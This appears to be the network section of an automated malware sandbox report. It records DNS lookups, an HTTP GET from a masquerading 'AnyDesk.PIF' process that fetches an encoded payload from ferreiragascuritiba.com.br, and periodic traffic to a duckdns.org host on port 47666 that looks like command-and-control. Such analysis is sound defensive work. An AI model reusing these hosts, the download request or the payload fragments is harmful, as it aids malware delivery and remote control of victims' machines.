                                                                                        Nov 20, 2024 07:53:13.920897961 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920909882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920921087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920931101 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920941114 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920947075 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920952082 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920955896 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920962095 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920965910 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920968056 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920972109 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920978069 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920983076 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920986891 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920996904 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921001911 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921040058 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921066046 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921072960 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921077967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921087980 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921097994 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921108007 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921118975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921125889 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921128988 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921139002 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921149015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921156883 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921159983 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921170950 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921173096 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921181917 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921192884 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921211004 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921215057 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921225071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921231031 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921236992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921247959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921247959 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921260118 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921269894 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921278954 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921281099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921288013 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921298027 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921308041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921309948 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921318054 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921327114 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921329975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921340942 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921349049 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921360016 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921382904 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921387911 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921392918 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921420097 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921432972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921433926 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921444893 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921454906 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921456099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921468019 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921478033 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921485901 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921495914 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921498060 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921506882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921518087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921528101 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921538115 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921541929 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921550035 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921561956 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921570063 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921576977 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921591043 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921593904 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921602011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921608925 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921617985 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921623945 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921628952 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921641111 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921652079 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921652079 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921665907 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921678066 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921679974 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921689034 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921700001 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921710014 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921720028 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921722889 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921730995 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921741962 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921746969 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921756983 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921768904 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921781063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921781063 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921792030 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921802998 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921813011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921813011 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921823025 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921835899 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921844959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921845913 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921844959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921854973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921860933 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921873093 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921886921 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921917915 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.922012091 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.922029972 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.922056913 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:17.802838087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:17.802902937 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:19.461368084 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:19.466176033 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:19.466253996 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:19.471998930 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:19.476793051 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.143476963 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.198467016 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.305665016 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.311702967 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.316664934 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.317198992 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.322073936 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.323347092 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.328242064 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.684839964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:20.763988018 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.765754938 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.774068117 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.923408031 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.980813026 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.998640060 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:21.004007101 CET8049710178.237.33.50192.168.2.8
                                                                                        Nov 20, 2024 07:53:21.006541014 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:21.006829023 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:21.011687994 CET8049710178.237.33.50192.168.2.8
                                                                                        Nov 20, 2024 07:53:21.627352953 CET8049710178.237.33.50192.168.2.8
                                                                                        Nov 20, 2024 07:53:21.628365040 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:21.923235893 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:21.928116083 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:22.626883984 CET8049710178.237.33.50192.168.2.8
                                                                                        Nov 20, 2024 07:53:22.627037048 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:51.123543024 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:51.125930071 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:51.130820990 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:54:21.438256025 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:54:21.439970016 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:54:21.444938898 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:54:51.861943960 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:54:51.863919973 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:54:51.868854046 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:55:10.978663921 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:11.369019032 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:12.056438923 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:13.353378057 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:15.853419065 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:20.759612083 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:22.195804119 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:55:22.199503899 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:55:22.204416037 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:55:30.369055033 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:52.673655033 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:55:52.676261902 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:55:52.681489944 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:56:23.040839911 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:56:23.042212963 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:56:23.047071934 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:56:53.448863983 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:56:53.451133966 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:56:53.456033945 CET476664970977.221.149.38192.168.2.8

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 20, 2024 07:53:11.769628048 CET6522653192.168.2.81.1.1.1
                                                                                        Nov 20, 2024 07:53:12.097208977 CET53652261.1.1.1192.168.2.8
                                                                                        Nov 20, 2024 07:53:19.342160940 CET5706553192.168.2.81.1.1.1
                                                                                        Nov 20, 2024 07:53:19.457752943 CET53570651.1.1.1192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.986335993 CET5510753192.168.2.81.1.1.1
                                                                                        Nov 20, 2024 07:53:20.993346930 CET53551071.1.1.1192.168.2.8

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 20, 2024 07:53:11.769628048 CET192.168.2.81.1.1.10xafeeStandard query (0)ferreiragascuritiba.com.brA (IP address)IN (0x0001)false
                                                                                        Nov 20, 2024 07:53:19.342160940 CET192.168.2.81.1.1.10x6496Standard query (0)iamblessed.duckdns.orgA (IP address)IN (0x0001)false
                                                                                        Nov 20, 2024 07:53:20.986335993 CET192.168.2.81.1.1.10xdc74Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 20, 2024 07:53:12.097208977 CET1.1.1.1192.168.2.80xafeeNo error (0)ferreiragascuritiba.com.br216.172.172.178A (IP address)IN (0x0001)false
                                                                                        Nov 20, 2024 07:53:19.457752943 CET1.1.1.1192.168.2.80x6496No error (0)iamblessed.duckdns.org77.221.149.38A (IP address)IN (0x0001)false
                                                                                        Nov 20, 2024 07:53:20.993346930 CET1.1.1.1192.168.2.80xdc74No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • ferreiragascuritiba.com.br
                                                                                        • geoplugin.net

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.849707216.172.172.178807748C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 20, 2024 07:53:12.260776043 CET177OUTGET /v/233_Faogvkghvqn HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                        Host: ferreiragascuritiba.com.br
                                                                                        Nov 20, 2024 07:53:12.721792936 CET1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 20 Nov 2024 06:53:12 GMT
                                                                                        Server: Apache
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, Keep-Alive
                                                                                        Last-Modified: Tue, 19 Nov 2024 04:59:53 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 1101508
                                                                                        Keep-Alive: timeout=5, max=75
                                                                                        Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 55 48 78 45 57 49 42 77 52 49 78 77 57 46 79 55 57 47 42 38 56 46 53 49 64 44 78 45 57 45 68 55 66 45 43 59 6a 46 52 73 52 49 78 6f 66 45 36 61 75 70 56 6b 6a 70 37 46 4c 55 51 34 63 46 43 4d 59 46 42 55 6a 48 68 75 6d 72 71 56 5a 49 36 65 78 53 33 52 70 64 33 4a 6f 62 48 64 6c 62 48 4a 35 65 4c 45 36 71 6b 35 4c 42 36 74 62 30 78 56 78 36 65 77 79 6a 69 47 44 44 2b 54 76 55 77 52 36 65 32 5a 4c 61 68 6a 2b 65 47 55 49 67 42 56 6a 48 68 72 71 6a 52 65 39 50 5a 46 4e 4f 43 4d 58 71 53 78 71 34 43 30 72 58 50 4d 30 66 63 4c 33 6c 51 38 34 41 56 70 53 5a 57 78 79 48 7a 45 49 73 77 65 78 4e 77 66 5a 62 6c 70 4c 6e 78 61 70 4c 46 51 65 68 37 71 49 34 4e 64 79 6b 52 6a 69 2f 49 51 65 62 57 72 6d 6d 42 4a 4c 53 51 5a 72 32 41 58 44 39 5a 52 34 31 76 4a 72 75 2b 71 59 63 4f 54 44 4e 56 2f 55 78 42 79 33 4c 67 68 2f 43 6e 77 51 57 54 30 4d 6c 68 50 6f 4f 70 43 6f 38 49 51 66 67 6e 48 30 42 72 6e 6a 51 34 67 6c 67 52 48 32 4c 63 32 35 6c 6e 57 4d 4b 78 76 79 2f 31 64 61 49 61 [TRUNCATED]
                                                                                        Data Ascii: pq6lWSOnsUsUHxEWIBwRIxwWFyUWGB8VFSIdDxEWEhUfECYjFRsRIxofE6aupVkjp7FLUQ4cFCMYFBUjHhumrqVZI6exS3Rpd3JobHdlbHJ5eLE6qk5LB6tb0xVx6ewyjiGDD+TvUwR6e2ZLahj+eGUIgBVjHhrqjRe9PZFNOCMXqSxq4C0rXPM0fcL3lQ84AVpSZWxyHzEIswexNwfZblpLnxapLFQeh7qI4NdykRji/IQebWrmmBJLSQZr2AXD9ZR41vJru+qYcOTDNV/UxBy3Lgh/CnwQWT0MlhPoOpCo8IQfgnH0BrnjQ4glgRH2Lc25lnWMKxvy/1daIaw2B5S1f18ibMzohRUQLFr/Z3nTcG38gQ76LbcETE0HUlalH7wDkxIO84ew5Wm89PSQF4kc8e9YVnhqceddlc90cUKUFfY0xHLihixoCXPinIabEu03FyQ+FY8v4CHHO4UY4i0SGN/8hSRWOX8SVD+bHd0/diaOKlVBTiilNRUp9jTy8C4MEoTwDE5lbFjtq5oUHTdTAQCblbFZsUFW0GJSxhK+OYcu8coSc3fvbNW94X5iEl2h8JN06sj8sCVq2Lucmsk1Vo0Gibb0ahCb87PlR4YVbkZZgCsPOOwf0jKM/GzT+44nFzVPAq0HVLQZdWnwNHa1iOI3jxL7QX4Xpj1STHJ2c1JgBswPknhLkB16MARMekJsd2USalXts61DCyQkXfxMYixzaXlIbQlrR2cIAlFzcrckq09YC0tzobAVdjskN5LjeskC2+n7emN9EVd0w22FF+cUd3KXc9XklBLiRykXanvwUFsNtzYCf3G5VKc3C38AWp6KJh1aclJhxl0GLt9Pinjqh+M83WJOlhb4aoBIA1RYgyfdQXJfqSexBVFXBqxGfmU2rSCzNZreMZPE9dggwUaaN4nA5ok/mhKpMZJbWHgEjSsVozaxanHhSo5itrWJhiSXeV5wfRk94R1oMHH8mltYeI
                                                                                        Nov 20, 2024 07:53:12.721932888 CET1236INData Raw: 53 76 63 65 70 34 59 58 4d 43 6d 78 45 6b 50 30 31 51 6d 68 5a 4e 51 55 75 68 43 33 4b 64 56 6e 73 5a 6a 63 50 33 32 48 68 5a 61 51 68 33 54 59 41 59 79 45 56 38 4f 70 73 58 64 55 4b 58 33 68 4d 34 64 6a 65 5a 48 43 41 39 57 6c 6d 44 4a 39 31 42
                                                                                        Data Ascii: Svcep4YXMCmxEkP01QmhZNQUuhC3KdVnsZjcP32HhZaQh3TYAYyEV8OpsXdUKX3hM4djeZHCA9WlmDJ91BdYCrvk0IS01rCHFqY3KExruJbdt2iWl1k9y+hiGzN8dqWGj/T5kTlOY4AWeM98fVcSjfN3Nmi3muc5b2z1EJZXNt6W2P/3wSgd9yaGy3QTD1amgKhCCzNoLP+ndydjRxcCVqbxx4ZW5p9bNmd3JoN7BqWhEVY3Jw6
                                                                                        Nov 20, 2024 07:53:12.721954107 CET1236INData Raw: 6c 34 59 6d 56 7a 62 58 64 6c 62 6d 6c 31 64 47 6c 33 63 6d 68 73 64 32 56 73 63 6e 46 6a 63 6e 42 70 63 33 4e 6d 61 33 6c 33 63 6e 5a 7a 61 58 68 69 5a 58 4e 74 64 32 56 75 61 58 56 30 61 58 64 79 61 47 78 33 5a 57 78 79 63 57 4e 79 63 47 6c 7a
                                                                                        Data Ascii: l4YmVzbXdlbml1dGl3cmhsd2VscnFjcnBpc3Nma3l3cnZzaXhiZXNtd2VuaXV0aXdyaGx3ZWxycWNycGlzc2ZreXdydnNpeGJlc213ZW5pdXRpd3JobHdlbHJxY3JwaXNzZmt5d3J2c2l4YmVzbXdlbml1dGl3cmhsd2VscnFjcnBpc3Nma3l3cnZzaXhiZXNtd2VuaXV0aXdyaGx3ZWxycWNycGlzc2ZreXdydnNpeGJlc213Z
                                                                                        Nov 20, 2024 07:53:12.721976995 CET1236INData Raw: 64 6c 62 48 4a 78 59 33 4a 77 61 58 4e 7a 5a 6d 74 35 64 33 4a 32 63 32 6c 34 59 6d 56 7a 62 58 64 6c 62 6d 6c 31 64 47 6c 33 63 6d 68 73 64 32 56 73 63 6e 46 6a 63 6e 42 70 63 33 4e 6d 61 33 6c 33 63 6e 5a 7a 61 58 68 69 5a 58 4e 74 64 32 56 75
                                                                                        Data Ascii: dlbHJxY3JwaXNzZmt5d3J2c2l4YmVzbXdlbml1dGl3cmhsd2VscnFjcnBpc3Nma3l3cnZzaXhiZXNtd2VuaXV0aXdyaGx3ZWxycWNycGlzc2ZreXdydnNpeGJlc213ZW5pdXRpd3JobHdlbHJxY3JwaXNzZmt5d+k96CHjAO7o5pvvdvNp3tXdQfI33U/m4euD6HDwz+qq8kTeEN9N8Fv7fept32nmYd1w8WfqdORf7fwhExKSI
                                                                                        Nov 20, 2024 07:53:12.721990108 CET1236INData Raw: 73 58 62 41 35 78 48 63 45 70 30 53 4b 70 4b 37 67 58 72 78 36 77 4a 4b 4d 62 52 78 34 4e 44 52 67 67 56 78 33 2f 47 67 63 6e 54 52 37 78 48 52 63 6f 46 68 73 52 49 35 4d 62 66 68 64 31 64 47 6c 32 6e 6d 69 4b 52 6d 58 69 61 74 2f 44 33 4d 7a 33
                                                                                        Data Ascii: sXbA5xHcEp0SKpK7gXrx6wJKMbRx4NDRggVx3/GgcnTR7xHRcoFhsRI5Mbfhd1dGl2nmiKRmXiat/D3Mz3v93O9anpnuir95zsRN006UDqBeFMaXdyW2yBRGxycfmacGlzf2aN+XfnjuaZ3J7xu+mz8e7tU+Dy4xLsjOOVIHojoyKgG0YhRRkJJQAmCxv+YmVzI3eTTmko/hwDJHQeXxVoJNETziLBI9cY0ynDJLYjpSqqFbcdp
                                                                                        Nov 20, 2024 07:53:12.722002983 CET1236INData Raw: 54 6b 37 65 66 71 49 2f 73 71 36 43 76 72 6a 2b 35 2f 34 59 76 71 67 75 52 6c 33 32 62 79 58 2b 70 6a 38 74 4c 75 30 65 50 56 34 4d 62 76 73 4f 43 68 36 35 37 6d 74 2b 55 37 37 6b 62 6b 53 65 77 73 34 42 44 68 46 2b 34 47 39 55 2f 6b 54 2b 41 42
                                                                                        Data Ascii: Tk7efqI/sq6Cvrj+5/4YvqguRl32byX+pj8tLu0ePV4MbvsOCh657mt+U77kbkSews4BDhF+4G9U/kT+AB6eLi5+7c5RzrHfIQ5Y30lueV5IfwZ99z5Grlbd6+89fry/PK77nineGe7qjhOOpF5z7kM+8P5STtBeEI4E3vTPTe5d7h7ugb4yDvFeSE6pPzgOSF9m7lXeZf82/c2+fS5tXd1vCv6LPwouyh4TTiRe0v4kDpEOQn5
                                                                                        Nov 20, 2024 07:53:12.722014904 CET1236INData Raw: 62 71 6c 65 47 61 37 49 66 6b 64 2b 31 79 38 57 33 63 58 64 39 69 38 47 44 66 62 65 52 6d 36 63 50 71 7a 50 48 62 36 38 4c 7a 79 64 2b 2b 33 73 76 78 76 50 71 6c 36 37 48 66 6e 65 61 64 33 61 54 78 71 2b 71 77 35 4b 50 74 4f 2b 6f 38 2b 30 6e 6f
                                                                                        Data Ascii: bqleGa7Ifkd+1y8W3cXd9i8GDfbeRm6cPqzPHb68Lzyd++3svxvPql67Hfnead3aTxq+qw5KPtO+o8+0noLOsy7kbhLuox6+ngIO0b5RPtAPEJ3E/fCPBM3wnkWukH6pHx+Ovh8+rf3d7o8d/6F+sj3w/mD90Y8ZfqhOSP7ZjqgfRu52Hkd/F73oPlduVl3mplc23XZYtIdXRp4wTsBuMF6Frlgub37dzn8e8n4ybik+2Q9pXnh
                                                                                        Nov 20, 2024 07:53:12.722029924 CET1236INData Raw: 41 33 33 79 6e 6b 47 4f 6c 4e 36 67 62 78 54 65 73 45 38 2f 4c 66 34 64 37 6f 38 56 76 36 44 2b 73 50 33 34 6e 6d 66 64 32 49 38 59 50 6c 5a 4f 74 7a 38 6d 44 6c 5a 66 54 4f 35 37 33 6b 76 2f 48 50 33 72 76 6c 73 75 53 31 33 37 62 79 50 75 70 43
                                                                                        Data Ascii: A33ynkGOlN6gbxTesE8/Lf4d7o8Vv6D+sP34nmfd2I8YPlZOtz8mDlZfTO573kv/HP3rvlsuS137byPupC8jHuMOMl4BjvAuBP607mB+X77uDk7ewr4CrhEe6U9YHkgeCR6GXjcO9r5Gzq2/PY5L31xual5bfwt9+j5EnlLN498zbrG/Mc7wniS+FO7ljh3urh5/ghUBxNIgAaSyaTJfgc7xH2IuIm7h3uKCgcKSEUHyEYECGRE
